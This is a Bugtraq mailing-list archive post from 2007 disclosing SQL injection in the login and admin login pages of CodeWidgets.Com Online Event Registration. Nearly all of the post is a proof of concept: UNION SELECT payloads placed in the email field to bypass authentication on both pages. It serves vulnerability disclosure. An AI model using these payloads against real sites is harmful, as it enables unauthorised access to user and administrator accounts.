Bugtraq mailing list archives

[Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection

From: Advisory () Aria-Security Net, "[ NO REPLY ]"@securityfocus.com
Date: 23 Oct 2007 22:43:45 -0000

http://Aria-Security.Net
-------------------------------------
CodeWidgets.Com Online Event Registration

Poc
Normal User account: (login.asp)
Email address: ' UNION SELECT * FROM users
password: Aria-Security.Net

Admin Panel: (admin_login.asp)
Email address: ' UNION SELECT * FROM admin
Password: Aria-Security.Net


Credits Goes To Aria-Security Team
Regards,
The-0utl4w

Current thread:

[Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection [ NO REPLY ] (Oct 24)